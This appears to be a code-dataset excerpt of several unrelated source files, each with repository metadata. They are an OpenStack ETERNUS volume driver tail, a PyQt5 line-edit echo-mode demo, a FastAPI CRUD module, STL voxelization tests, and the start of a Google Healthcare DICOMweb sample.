cpsession_instance = self.conn.GetInstance(
cpsession,
LocalOnly=False)
except Exception:
cpsession_instance = None
# if copy session is none,
# it means copy session was finished,break and return
if cpsession_instance is None:
break
LOG.debug('_wait_for_copy_complete, '
'find target copysession, '
'wait for end of copysession.')
if cpsession_instance['CopyState'] == BROKEN:
msg = (_('_wait_for_copy_complete, '
'cpsession: %(cpsession)s, '
'copysession state is BROKEN.')
% {'cpsession': cpsession})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
time.sleep(10)
@utils.retry(exception.VolumeBackendAPIException)
def _delete_copysession(self, cpsession):
"""delete copysession."""
LOG.debug('_delete_copysession: cpssession: %s.', cpsession)
try:
cpsession_instance = self._get_eternus_instance(
cpsession, LocalOnly=False)
except Exception:
LOG.info('_delete_copysession, '
'the copysession was already completed.')
return
copytype = cpsession_instance['CopyType']
# set oparation code
# SnapOPC: 19 (Return To ResourcePool)
# OPC:8 (Detach)
# EC/REC:8 (Detach)
operation = OPERATION_dic.get(copytype, None)
if operation is None:
msg = (_('_delete_copysession, '
'copy session type is undefined! '
'copy session: %(cpsession)s, '
'copy type: %(copytype)s.')
% {'cpsession': cpsession,
'copytype': copytype})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
repservice = self._find_eternus_service(REPL)
if repservice is None:
msg = (_('_delete_copysession, '
'Cannot find Replication Service'))
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
# Invoke method for delete copysession
rc, errordesc, job = self._exec_eternus_service(
'ModifyReplicaSynchronization',
repservice,
Operation=self._pywbem_uint(operation, '16'),
Synchronization=cpsession,
Force=True,
WaitForCopyState=self._pywbem_uint(15, '16'))
LOG.debug('_delete_copysession, '
'copysession: %(cpsession)s, '
'operation: %(operation)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s.',
{'cpsession': cpsession,
'operation': operation,
'rc': rc,
'errordesc': errordesc})
if rc == COPYSESSION_NOT_EXIST:
LOG.debug('_delete_copysession, '
'cpsession: %(cpsession)s, '
'copysession is not exist.',
{'cpsession': cpsession})
elif rc == VOLUME_IS_BUSY:
msg = (_('_delete_copysession, '
'copysession: %(cpsession)s, '
'operation: %(operation)s, '
'Error: Volume is in Busy state')
% {'cpsession': cpsession,
'operation': operation})
raise exception.VolumeIsBusy(msg)
elif rc != 0:
msg = (_('_delete_copysession, '
'copysession: %(cpsession)s, '
'operation: %(operation)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s.')
% {'cpsession': cpsession,
'operation': operation,
'rc': rc,
'errordesc': errordesc})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def _get_target_port(self):
"""return target portid."""
LOG.debug('_get_target_port, protocol: %s.', self.protocol)
target_portlist = []
if self.protocol == 'fc':
prtcl_endpoint = 'FUJITSU_SCSIProtocolEndpoint'
connection_type = 2
elif self.protocol == 'iSCSI':
prtcl_endpoint = 'FUJITSU_iSCSIProtocolEndpoint'
connection_type = 7
try:
tgtportlist = self._enum_eternus_instances(prtcl_endpoint)
except Exception:
msg = (_('_get_target_port, '
'EnumerateInstances, '
'cannot connect to ETERNUS.'))
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
for tgtport in tgtportlist:
# Check : protocol of tgtport
if tgtport['ConnectionType'] != connection_type:
continue
# Check : if port is for remote copy, continue
if (tgtport['RAMode'] & 0x7B) != 0x00:
continue
# Check : if port is for StorageCluster, continue
if 'SCGroupNo' in tgtport:
continue
target_portlist.append(tgtport)
LOG.debug('_get_target_port, '
'connection type: %(cont)s, '
'ramode: %(ramode)s.',
{'cont': tgtport['ConnectionType'],
'ramode': tgtport['RAMode']})
LOG.debug('_get_target_port, '
'target port: %(target_portid)s.',
{'target_portid': target_portlist})
if len(target_portlist) == 0:
msg = (_('_get_target_port, '
'protcol: %(protocol)s, '
'target_port not found.')
% {'protocol': self.protocol})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('_get_target_port, ret: %s.', target_portlist)
return target_portlist
@lockutils.synchronized('ETERNUS-connect', 'cinder-', True)
def _map_lun(self, vol_instance, connector, targetlist=None):
"""map volume to host."""
volumename = vol_instance['ElementName']
LOG.debug('_map_lun, '
'volume name: %(vname)s, connector: %(connector)s.',
{'vname': volumename, 'connector': connector})
volume_uid = vol_instance['Name']
initiatorlist = self._find_initiator_names(connector)
aglist = self._find_affinity_group(connector)
configservice = self._find_eternus_service(CTRL_CONF)
if targetlist is None:
targetlist = self._get_target_port()
if configservice is None:
msg = (_('_map_lun, '
'vol_instance.path:%(vol)s, '
'volumename: %(volumename)s, '
'volume_uid: %(uid)s, '
'initiator: %(initiator)s, '
'target: %(tgt)s, '
'aglist: %(aglist)s, '
'Storage Configuration Service not found.')
% {'vol': vol_instance.path,
'volumename': volumename,
'uid': volume_uid,
'initiator': initiatorlist,
'tgt': targetlist,
'aglist': aglist})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('_map_lun, '
'vol_instance.path: %(vol_instance)s, '
'volumename:%(volumename)s, '
'initiator:%(initiator)s, '
'target:%(tgt)s.',
{'vol_instance': vol_instance.path,
'volumename': [volumename],
'initiator': initiatorlist,
'tgt': targetlist})
if not aglist:
# Create affinity group and set host-affinity.
for target in targetlist:
LOG.debug('_map_lun, '
'lun_name: %(volume_uid)s, '
'Initiator: %(initiator)s, '
'target: %(target)s.',
{'volume_uid': [volume_uid],
'initiator': initiatorlist,
'target': target['Name']})
rc, errordesc, job = self._exec_eternus_service(
'ExposePaths',
configservice,
LUNames=[volume_uid],
InitiatorPortIDs=initiatorlist,
TargetPortIDs=[target['Name']],
DeviceAccesses=[self._pywbem_uint(2, '16')])
LOG.debug('_map_lun, '
'Error: %(errordesc)s, '
'Return code: %(rc)lu, '
'Create affinitygroup and set host-affinity.',
{'errordesc': errordesc,
'rc': rc})
if rc != 0 and rc != LUNAME_IN_USE:
LOG.warning('_map_lun, '
'lun_name: %(volume_uid)s, '
'Initiator: %(initiator)s, '
'target: %(target)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s.',
{'volume_uid': [volume_uid],
'initiator': initiatorlist,
'target': target['Name'],
'rc': rc,
'errordesc': errordesc})
else:
# Add lun to affinity group
for ag in aglist:
LOG.debug('_map_lun, '
'ag: %(ag)s, lun_name: %(volume_uid)s.',
{'ag': ag,
'volume_uid': volume_uid})
rc, errordesc, job = self._exec_eternus_service(
'ExposePaths',
configservice, LUNames=[volume_uid],
DeviceAccesses=[self._pywbem_uint(2, '16')],
ProtocolControllers=[ag])
LOG.debug('_map_lun, '
'Error: %(errordesc)s, '
'Return code: %(rc)lu, '
'Add lun to affinity group.',
{'errordesc': errordesc,
'rc': rc})
if rc != 0 and rc != LUNAME_IN_USE:
LOG.warning('_map_lun, '
'lun_name: %(volume_uid)s, '
'Initiator: %(initiator)s, '
'ag: %(ag)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s.',
{'volume_uid': [volume_uid],
'initiator': initiatorlist,
'ag': ag,
'rc': rc,
'errordesc': errordesc})
def _find_initiator_names(self, connector):
"""return initiator names."""
initiatornamelist = []
if self.protocol == 'fc' and connector['wwpns']:
LOG.debug('_find_initiator_names, wwpns: %s.',
connector['wwpns'])
initiatornamelist = connector['wwpns']
elif self.protocol == 'iSCSI' and connector['initiator']:
LOG.debug('_find_initiator_names, initiator: %s.',
connector['initiator'])
initiatornamelist.append(connector['initiator'])
if not initiatornamelist:
msg = (_('_find_initiator_names, '
'connector: %(connector)s, '
'initiator not found.')
% {'connector': connector})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('_find_initiator_names, '
'initiator list: %(initiator)s.',
{'initiator': initiatornamelist})
return initiatornamelist
def _find_affinity_group(self, connector, vol_instance=None):
"""find affinity group from connector."""
LOG.debug('_find_affinity_group, vol_instance: %s.', vol_instance)
affinity_grouplist = []
initiatorlist = self._find_initiator_names(connector)
if vol_instance is None:
try:
aglist = self._enum_eternus_instance_names(
'FUJITSU_AffinityGroupController')
except Exception:
msg = (_('_find_affinity_group, '
'connector: %(connector)s, '
'EnumerateInstanceNames, '
'cannot connect to ETERNUS.')
% {'connector': connector})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('_find_affinity_group,'
'affinity_groups:%s', aglist)
else:
try:
aglist = self._assoc_eternus_names(
vol_instance.path,
AssocClass='FUJITSU_ProtocolControllerForUnit',
ResultClass='FUJITSU_AffinityGroupController')
except Exception:
msg = (_('_find_affinity_group,'
'connector: %(connector)s,'
'AssocNames: FUJITSU_ProtocolControllerForUnit, '
'cannot connect to ETERNUS.')
% {'connector': connector})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('_find_affinity_group, '
'vol_instance.path: %(volume)s, '
'affinity_groups: %(aglist)s.',
{'volume': vol_instance.path,
'aglist': aglist})
for ag in aglist:
try:
hostaglist = self._assoc_eternus(
ag,
AssocClass='FUJITSU_AuthorizedTarget',
ResultClass='FUJITSU_AuthorizedPrivilege')
except Exception:
msg = (_('_find_affinity_group, '
'connector: %(connector)s, '
'Associators: FUJITSU_AuthorizedTarget, '
'cannot connect to ETERNUS.')
% {'connector': connector})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
for hostag in hostaglist:
for initiator in initiatorlist:
if initiator.lower() not in hostag['InstanceID'].lower():
continue
LOG.debug('_find_affinity_group, '
'AffinityGroup: %(ag)s.', {'ag': ag})
affinity_grouplist.append(ag)
break
break
LOG.debug('_find_affinity_group, '
'initiators: %(initiator)s, '
'affinity_group: %(affinity_group)s.',
{'initiator': initiatorlist,
'affinity_group': affinity_grouplist})
return affinity_grouplist
@lockutils.synchronized('ETERNUS-connect', 'cinder-', True)
def _unmap_lun(self, volume, connector, force=False):
"""unmap volume from host."""
LOG.debug('_map_lun, volume id: %(vid)s, '
'connector: %(connector)s, force: %(frc)s.',
{'vid': volume['id'],
'connector': connector, 'frc': force})
volumename = self._create_volume_name(volume['id'])
vol_instance = self._find_lun(volume)
if vol_instance is None:
LOG.info('_unmap_lun, '
'volumename:%(volumename)s, '
'volume not found.',
{'volumename': volumename})
return False
volume_uid = vol_instance['Name']
if not force:
aglist = self._find_affinity_group(connector, vol_instance)
if not aglist:
LOG.info('_unmap_lun, '
'volumename: %(volumename)s, '
'volume is not mapped.',
{'volumename': volumename})
return False
else:
try:
aglist = self._assoc_eternus_names(
vol_instance.path,
AssocClass='CIM_ProtocolControllerForUnit',
ResultClass='FUJITSU_AffinityGroupController')
except Exception:
msg = (_('_unmap_lun,'
'vol_instance.path: %(volume)s, '
'AssociatorNames: CIM_ProtocolControllerForUnit, '
'cannot connect to ETERNUS.')
% {'volume': vol_instance.path})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('_unmap_lun, '
'vol_instance.path: %(volume)s, '
'affinity_groups: %(aglist)s.',
{'volume': vol_instance.path,
'aglist': aglist})
configservice = self._find_eternus_service(CTRL_CONF)
if configservice is None:
msg = (_('_unmap_lun, '
'vol_instance.path: %(volume)s, '
'volumename: %(volumename)s, '
'volume_uid: %(uid)s, '
'aglist: %(aglist)s, '
'Controller Configuration Service not found.')
% {'vol': vol_instance.path,
'volumename': [volumename],
'uid': [volume_uid],
'aglist': aglist})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
for ag in aglist:
LOG.debug('_unmap_lun, '
'volumename: %(volumename)s, '
'volume_uid: %(volume_uid)s, '
'AffinityGroup: %(ag)s.',
{'volumename': volumename,
'volume_uid': volume_uid,
'ag': ag})
rc, errordesc, job = self._exec_eternus_service(
'HidePaths',
configservice,
LUNames=[volume_uid],
ProtocolControllers=[ag])
LOG.debug('_unmap_lun, '
'Error: %(errordesc)s, '
'Return code: %(rc)lu.',
{'errordesc': errordesc,
'rc': rc})
if rc == LUNAME_NOT_EXIST:
LOG.debug('_unmap_lun, '
'volumename: %(volumename)s, '
'Invalid LUNames.',
{'volumename': volumename})
elif rc != 0:
msg = (_('_unmap_lun, '
'volumename: %(volumename)s, '
'volume_uid: %(volume_uid)s, '
'AffinityGroup: %(ag)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s.')
% {'volumename': volumename,
'volume_uid': volume_uid,
'ag': ag,
'rc': rc,
'errordesc': errordesc})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('_unmap_lun, '
'volumename: %(volumename)s.',
{'volumename': volumename})
return True
def _get_eternus_iscsi_properties(self):
"""get target port iqns and target_portals."""
iscsi_properties_list = []
iscsiip_list = self._get_drvcfg('EternusISCSIIP', multiple=True)
iscsi_port = self.configuration.target_port
LOG.debug('_get_eternus_iscsi_properties, iplist: %s.', iscsiip_list)
try:
ip_endpointlist = self._enum_eternus_instance_names(
'FUJITSU_IPProtocolEndpoint')
except Exception:
msg = (_('_get_eternus_iscsi_properties, '
'iscsiip: %(iscsiip)s, '
'EnumerateInstanceNames, '
'cannot connect to ETERNUS.')
% {'iscsiip': iscsiip_list})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
for ip_endpoint in ip_endpointlist:
try:
ip_endpoint_instance = self._get_eternus_instance(
ip_endpoint)
ip_address = ip_endpoint_instance['IPv4Address']
LOG.debug('_get_eternus_iscsi_properties, '
'instanceip: %(ip)s, '
'iscsiip: %(iscsiip)s.',
{'ip': ip_address,
'iscsiip': iscsiip_list})
except Exception:
msg = (_('_get_eternus_iscsi_properties, '
'iscsiip: %(iscsiip)s, '
'GetInstance, '
'cannot connect to ETERNUS.')
% {'iscsiip': iscsiip_list})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
if ip_address not in iscsiip_list:
continue
LOG.debug('_get_eternus_iscsi_properties, '
'find iscsiip: %(ip)s.', {'ip': ip_address})
try:
tcp_endpointlist = self._assoc_eternus_names(
ip_endpoint,
AssocClass='CIM_BindsTo',
ResultClass='FUJITSU_TCPProtocolEndpoint')
except Exception:
msg = (_('_get_eternus_iscsi_properties, '
'iscsiip: %(iscsiip)s, '
'AssociatorNames: CIM_BindsTo, '
'cannot connect to ETERNUS.')
% {'iscsiip': ip_address})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
for tcp_endpoint in tcp_endpointlist:
try:
iscsi_endpointlist = (
self._assoc_eternus(tcp_endpoint,
AssocClass='CIM_BindsTo',
ResultClass='FUJITSU_iSCSI'
'ProtocolEndpoint'))
except Exception:
msg = (_('_get_eternus_iscsi_properties, '
'iscsiip: %(iscsiip)s, '
'AssociatorNames: CIM_BindsTo, '
'cannot connect to ETERNUS.')
% {'iscsiip': ip_address})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
for iscsi_endpoint in iscsi_endpointlist:
target_portal = "%s:%s" % (ip_address, iscsi_port)
iqn = iscsi_endpoint['Name'].split(',')[0]
iscsi_properties_list.append((iscsi_endpoint.path,
target_portal,
iqn))
LOG.debug('_get_eternus_iscsi_properties, '
'target_portal: %(target_portal)s, '
'iqn: %(iqn)s.',
{'target_portal': target_portal,
'iqn': iqn})
if len(iscsi_properties_list) == 0:
msg = (_('_get_eternus_iscsi_properties, '
'iscsiip list: %(iscsiip_list)s, '
'iqn not found.')
% {'iscsiip_list': iscsiip_list})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('_get_eternus_iscsi_properties, '
'iscsi_properties_list: %(iscsi_properties_list)s.',
{'iscsi_properties_list': iscsi_properties_list})
return iscsi_properties_list
def _wait_for_job_complete(self, conn, job):
"""Given the job wait for it to complete."""
self.retries = 0
self.wait_for_job_called = False
def _wait_for_job_complete():
"""Called at an interval until the job is finished."""
if self._is_job_finished(conn, job):
raise loopingcall.LoopingCallDone()
if self.retries > JOB_RETRIES:
LOG.error("_wait_for_job_complete, "
"failed after %(retries)d tries.",
{'retries': self.retries})
raise loopingcall.LoopingCallDone()
try:
self.retries += 1
if not self.wait_for_job_called:
if self._is_job_finished(conn, job):
self.wait_for_job_called = True
except Exception:
exceptionMessage = _("Issue encountered waiting for job.")
LOG.exception(exceptionMessage)
raise exception.VolumeBackendAPIException(exceptionMessage)
self.wait_for_job_called = False
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_job_complete)
timer.start(interval=JOB_INTERVAL_SEC).wait()
jobInstanceName = job['Job']
jobinstance = conn.GetInstance(jobInstanceName,
LocalOnly=False)
rc = jobinstance['ErrorCode']
LOG.debug('_wait_for_job_complete, rc: %s.', rc)
return rc
def _is_job_finished(self, conn, job):
"""Check if the job is finished."""
jobInstanceName = job['Job']
jobinstance = conn.GetInstance(jobInstanceName,
LocalOnly=False)
jobstate = jobinstance['JobState']
LOG.debug('_is_job_finished,'
'state: %(state)s', {'state': jobstate})
# From ValueMap of JobState in CIM_ConcreteJob
# 2=New, 3=Starting, 4=Running, 32767=Queue Pending
# ValueMap("2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13..32767,
# 32768..65535"),
# Values("New, Starting, Running, Suspended, Shutting Down,
# Completed, Terminated, Killed, Exception, Service,
# Query Pending, DMTF Reserved, Vendor Reserved")]
# NOTE(deva): string matching based on
# http://ipmitool.cvs.sourceforge.net/
# viewvc/ipmitool/ipmitool/lib/ipmi_chassis.c
if jobstate in [2, 3, 4]:
job_finished = False
else:
job_finished = True
LOG.debug('_is_job_finished, finish: %s.', job_finished)
return job_finished
def _pywbem_uint(self, num, datatype):
try:
result = {
'8': pywbem.Uint8(num),
'16': pywbem.Uint16(num),
'32': pywbem.Uint32(num),
'64': pywbem.Uint64(num)
}
result = result.get(datatype, num)
except NameError:
result = num
return result
| 39.547945
| 79
| 0.529558
|
4a02243c25af8646b0670532674ab3f8d1cac960
| 1,499
|
py
|
Python
|
pyqt/pyqt5-master/src/controls/QLineEditEchoMode.py
|
Ding-zhenke/Dcount-s-notebook
|
16c29ac7d076c466e053f1b8db4a7f4e43f67a24
|
[
"MIT"
] | null | null | null |
pyqt/pyqt5-master/src/controls/QLineEditEchoMode.py
|
Ding-zhenke/Dcount-s-notebook
|
16c29ac7d076c466e053f1b8db4a7f4e43f67a24
|
[
"MIT"
] | null | null | null |
pyqt/pyqt5-master/src/controls/QLineEditEchoMode.py
|
Ding-zhenke/Dcount-s-notebook
|
16c29ac7d076c466e053f1b8db4a7f4e43f67a24
|
[
"MIT"
] | 2
|
2019-06-18T05:53:26.000Z
|
2019-06-19T03:26:02.000Z
|
'''
QLineEdit控件与回显模式
基本功能:输入单行的文本
EchoMode(回显模式)
4种回显模式
1. Normal
2. NoEcho
3. Password
4. PasswordEchoOnEdit
Mac : Command Windows:Control
'''
from PyQt5.QtWidgets import *
import sys
class QLineEditEchoMode(QWidget) :
def __init__(self):
super(QLineEditEchoMode,self).__init__()
self.initUI()
def initUI(self):
self.setWindowTitle('文本输入框的回显模式')
formLayout = QFormLayout()
normalLineEdit = QLineEdit()
noEchoLineEdit = QLineEdit()
passwordLineEdit = QLineEdit()
passwordEchoOnEditLineEdit = QLineEdit()
formLayout.addRow("Normal",normalLineEdit)
formLayout.addRow("NoEcho", noEchoLineEdit)
formLayout.addRow("Password",passwordLineEdit)
formLayout.addRow("PasswordEchoOnEdit",passwordEchoOnEditLineEdit)
# placeholdertext
normalLineEdit.setPlaceholderText("Normal")
noEchoLineEdit.setPlaceholderText("NoEcho")
passwordLineEdit.setPlaceholderText("Password")
passwordEchoOnEditLineEdit.setPlaceholderText("PasswordEchoOnEdit")
normalLineEdit.setEchoMode(QLineEdit.Normal)
noEchoLineEdit.setEchoMode(QLineEdit.NoEcho)
passwordLineEdit.setEchoMode(QLineEdit.Password)
passwordEchoOnEditLineEdit.setEchoMode(QLineEdit.PasswordEchoOnEdit)
self.setLayout(formLayout)
if __name__ == '__main__':
app = QApplication(sys.argv)
main = QLineEditEchoMode()
main.show()
sys.exit(app.exec_())
| 24.57377
| 76
| 0.708472
|
4a022448f6064e33833a466c26ececc0608389b6
| 2,237
|
py
|
Python
|
{{cookiecutter.project_slug}}/backend/app/db/tipo_acordo/crud.py
|
souzjfe/conectar
|
0603e955394765f3fc1a01bbd902be695bc44cba
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_slug}}/backend/app/db/tipo_acordo/crud.py
|
souzjfe/conectar
|
0603e955394765f3fc1a01bbd902be695bc44cba
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_slug}}/backend/app/db/tipo_acordo/crud.py
|
souzjfe/conectar
|
0603e955394765f3fc1a01bbd902be695bc44cba
|
[
"MIT"
] | null | null | null |
from fastapi import HTTPException, status
from sqlalchemy.orm import Session
import typing as t
from app.db import models
from . import schemas
def get_tipo_acordo(db: Session, tipo_acordo_id: int) -> schemas.TipoAcordo:
tipo_acordo = (
db.query(models.TipoAcordo)
.filter(models.TipoAcordo.id == tipo_acordo_id)
.first()
)
if not tipo_acordo:
raise HTTPException(
status_code=404, detail="tipo_acordo não encontrado"
)
return tipo_acordo
async def create_tipo_acordo(
db: Session, tipo_acordo: schemas.TipoAcordoCreate
) -> schemas.TipoAcordo:
filtro = db.query(models.Area)\
.filter(models.TipoAcordo.descricao == tipo_acordo.descricao)\
.first()
if filtro:
raise HTTPException(status_code=409, detail="TipoAcordo já cadastrado")
try:
db_tipo_acordo = models.TipoAcordo(
descricao=tipo_acordo.descricao,
)
db.add(db_tipo_acordo)
db.commit()
db.refresh(db_tipo_acordo)
return db_tipo_acordo
except Exception as e:
raise e
def edit_tipo_acordo(
db: Session, tipo_acordo_id: int, tipo_acordo: schemas.TipoAcordoEdit
) -> schemas.TipoAcordoEdit:
db_tipo_acordo = get_tipo_acordo(db, tipo_acordo_id)
if not db_tipo_acordo:
raise HTTPException(
status.HTTP_404_NOT_FOUND, detail="tipo_acordo não encontrado"
)
update_data = tipo_acordo.dict(exclude_unset=True)
filtro = db.query(models.Area)\
.filter(models.TipoAcordo.descricao == update_data["descricao"])\
.first()
if filtro:
raise HTTPException(status_code=409, detail="TipoAcordo já cadastrado")
for key, value in update_data.items():
setattr(db_tipo_acordo, key, value)
db.add(db_tipo_acordo)
db.commit()
db.refresh(db_tipo_acordo)
return db_tipo_acordo
def delete_tipo_acordo(db: Session, tipo_acordo_id: int):
tipo_acordo = get_tipo_acordo(db, tipo_acordo_id)
if not tipo_acordo:
raise HTTPException(
status.HTTP_404_NOT_FOUND, detail="tipo_acordo não encontrado"
)
db.delete(tipo_acordo)
db.commit()
return tipo_acordo
| 25.712644
| 79
| 0.676799
|
4a02246caa3e8db09e2997ed6087a0c8f91323f2
| 4,787
|
py
|
Python
|
python/test/test_perimeter.py
|
beyse/voxel8
|
04ff337ece1bccbe6b785ae1a8190779a6619a64
|
[
"MIT"
] | 66
|
2018-05-28T00:13:48.000Z
|
2022-03-19T03:39:26.000Z
|
python/test/test_perimeter.py
|
beyse/voxel8
|
04ff337ece1bccbe6b785ae1a8190779a6619a64
|
[
"MIT"
] | 29
|
2018-06-19T12:15:10.000Z
|
2021-11-28T06:02:35.000Z
|
python/test/test_perimeter.py
|
beyse/voxel8
|
04ff337ece1bccbe6b785ae1a8190779a6619a64
|
[
"MIT"
] | 46
|
2018-06-03T01:14:09.000Z
|
2022-02-13T14:27:05.000Z
|
import numpy as np
import unittest
from stltovoxel import perimeter
class TestPerimeter(unittest.TestCase):
def test_lines_to_pixels(self):
test = [[(0, 0, 0), (3, 0, 0)],
[(9, 9, 0), (3, 9, 0)],
[(3, 0, 0), (9, 9, 0)],
[(3, 9, 0), (0, 0, 0)]]
actual = np.zeros((13, 13), dtype=bool)
perimeter.lines_to_voxels(test, actual)
expected = [
[0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
]
self.assertEqual(expected, actual.astype(int).tolist())
def test_cross_line(self):
pixels = np.zeros((100, 100), dtype=bool)
# when z=133, x=55 at Eiffel_tower_sample.STL, resolution=100
lines = [
((55.183775000510195, 42.91771076583979, 133.0), (54.664478438939994, 42.91190079807315, 133.0)),
((55.05365382117602, 48.399582783540694, 133.0), (54.28259953472679, 48.399582783540694, 133.0)),
((54.72938801464095, 51.1054056827822, 133.0), (55.21085292933077, 51.10540695761318, 133.0)),
((55.17312327125145, 54.131620716008165, 133.0), (54.72938801464095, 54.13161531213461, 133.0)),
((54.28259953472679, 48.399582783540694, 133.0), (55.05365382117602, 48.399582783540694, 133.0)),
((55.05365382117602, 50.600419560857354, 133.0), (54.28259953472679, 50.600419560857354, 133.0)),
((54.72938801464095, 44.868384133402195, 133.0), (55.21085292933077, 44.868386286857266, 133.0)),
((55.183775000510195, 56.0822892341602, 133.0), (54.664478438939994, 56.088101893431286, 133.0)),
((55.17312327125145, 47.89459328407937, 133.0), (54.72938801464095, 47.894596812904574, 133.0))
]
x = 55
# have assert or Exception in paint_y_axis()
perimeter.paint_y_axis(lines, pixels, x)
pixels = np.zeros((512, 512), dtype=bool)
# python stltovoxel.py data/Model.stl data/Model.png 512
lines = [
((164.09973516910665, 210.30269491875893, 292.0), (162.88562081679706, 211.99251111205203, 292.0)),
((163.6486419675717, 400.48144695905705, 292.0), (162.98334736067383, 399.69497154303264, 292.0)),
((163.12053950901193, 399.083573336035, 292.0), (162.75365385590837, 399.3013424292643, 292.0)),
((162.09875517681738, 155.11154635650513, 292.0), (163.03976252838729, 154.67417098395714, 292.0)),
((162.922318771988, 177.86366465114196, 292.0), (164.23901942305332, 178.47337917148627, 292.0))
]
x = 163
# have assert or Exception in paint_y_axis()
perimeter.paint_y_axis(lines, pixels, x)
pixels = np.zeros((1024, 1024), dtype=bool)
# python stltovoxel.py data/Model.stl data/Model.png 1024
lines = [
((478.1953748963024, 685.5971369469289, 390.0), (474.987648897627, 682.7858002239518, 390.0)),
((478.6458712360894, 708.867925235024, 390.0), (476.80635493021373, 709.6422457310404, 390.0)),
((476.8066506675348, 704.1490977931986, 390.0), (478.9686356730549, 707.4220913093288, 390.0)),
((475.51186735002426, 568.0120562125561, 390.0), (477.6508098598742, 568.5847941911843, 390.0)),
((476.9319294711261, 643.620807438934, 390.0), (477.55874656005545, 643.8324324309802, 390.0)),
((477.6538957136681, 644.1949502652121, 390.0), (476.50764488546764, 647.3730220867313, 390.0)),
((477.1678215835232, 574.2494597833005, 390.0), (475.625871469434, 575.2964648366983, 390.0)),
((476.71719857029177, 276.879543451238, 390.0), (478.92572111642284, 275.85023482493455, 390.0)),
((475.7395840585432, 726.9413018914573, 390.0), (477.6455166631113, 728.1006656939942, 390.0)),
((480.1531171455746, 424.8577588241842, 390.0), (474.50256297902456, 421.5806451519458, 390.0)),
((476.33245691945507, 647.8338656180929, 390.0), (477.3585664525454, 650.5878998039989, 390.0))
]
x = 477
# have assert or Exception in paint_y_axis()
perimeter.paint_y_axis(lines, pixels, x)
if __name__ == '__main__':
unittest.main()
| 56.317647
| 111
| 0.577815
|
4a0224722b512d34c74d30101a3b53aff74c32eb
| 12,805
|
py
|
Python
|
healthcare/api-client/dicom/dicomweb.py
|
nilold/python-docs-samples
|
a6405189fc47dd41b90c185061293105eebd8a94
|
[
"Apache-2.0"
] | 2
|
2021-08-04T19:13:44.000Z
|
2021-10-04T02:47:49.000Z
|
healthcare/api-client/dicom/dicomweb.py
|
nilold/python-docs-samples
|
a6405189fc47dd41b90c185061293105eebd8a94
|
[
"Apache-2.0"
] | 320
|
2020-11-08T21:02:43.000Z
|
2022-02-10T10:43:29.000Z
|
healthcare/api-client/dicom/dicomweb.py
|
nilold/python-docs-samples
|
a6405189fc47dd41b90c185061293105eebd8a94
|
[
"Apache-2.0"
] | 2
|
2019-11-04T18:25:20.000Z
|
2019-11-05T14:35:28.000Z
|
# Copyright 2018 Google LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import json
import os
from google.auth.transport import requests
from googleapiclient.errors import HttpError
from google.oauth2 import service_account
_BASE_URL = 'https://healthcare.googleapis.com/v1beta1'
def get_session(service_account_json):
"""Returns an authorized Requests Session class using the service account
credentials JSON. This class is used to perform requests to the
Cloud Healthcare API endpoint."""
# Pass in the credentials and project ID. If none supplied, get them
# from the environment.
credentials = service_account.Credentials.from_service_account_file(
service_account_json)
scoped_credentials = credentials.with_scopes(
['https://www.googleapis.com/auth/cloud-platform'])
# Create a requests Session object with the credentials.
session = requests.AuthorizedSession(scoped_credentials)
return session
# [START healthcare_dicomweb_store_instance]
def dicomweb_store_instance(
service_account_json,
base_url,
project_id,
cloud_region,
dataset_id,
dicom_store_id,
dcm_file):
